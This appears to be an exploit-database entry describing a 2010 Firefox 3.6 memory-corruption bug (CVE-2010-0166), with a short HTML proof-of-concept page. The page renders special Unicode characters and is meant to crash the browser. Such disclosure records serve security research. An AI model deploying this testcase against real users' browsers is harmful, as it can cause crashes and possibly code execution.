[] NeoSense
E X P L O I T S
title author type platform port cve id

Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption

Author: Jesse Ruderman
type: dos
platform: multiple
port: 
date_added: 2010-03-24 
date_updated: 2014-06-18 
verified: 1 
codes: CVE-2010-0166;OSVDB-63266 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/38943/info

Mozilla Firefox is prone to a remote memory-corruption vulnerability.

Successful exploits may allow an attacker to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.

Firefox 3.6 for Apple Mac OS X is vulnerable.

NOTE: This issue was previously covered in BID 38918 (Mozilla Firefox Thunderbird and Seamonkey MFSA 2010-09 through -15 Multiple Vulnerabilities) but has been assigned its own record to better document it.

<html> <head> <title>Testcase for bug 538065</title> <style type="text/css"> span.test { background: #ff0; } </style> </head> <body> <p>U+FEFF: <span class="test">&#xfeff;</span></p> <p>U+FFF9: <span class="test">&#xfff9;</span></p> <p>U+FFFA: <span class="test">&#xfffa;</span></p> <p>U+FFFB: <span class="test">&#xfffb;</span></p> </body> </html>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.